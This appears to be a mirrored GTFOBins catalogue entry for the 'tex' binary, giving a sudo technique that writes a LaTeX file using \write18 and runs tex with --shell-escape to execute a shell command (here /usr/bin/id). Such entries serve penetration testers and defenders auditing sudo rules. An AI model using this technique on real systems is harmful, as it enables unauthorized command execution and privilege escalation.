mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-01-07 00:01:33 +01:00
7 lines
280 B
Markdown
7 lines
280 B
Markdown
description: `tex` has a similar behaviour as [`pdftex`](/gtfobins/pdftex/)
|
|
functions:
|
|
sudo:
|
|
- code: |
|
|
echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
|
|
tex -interaction=nonstopmode --shell-escape file.tex
|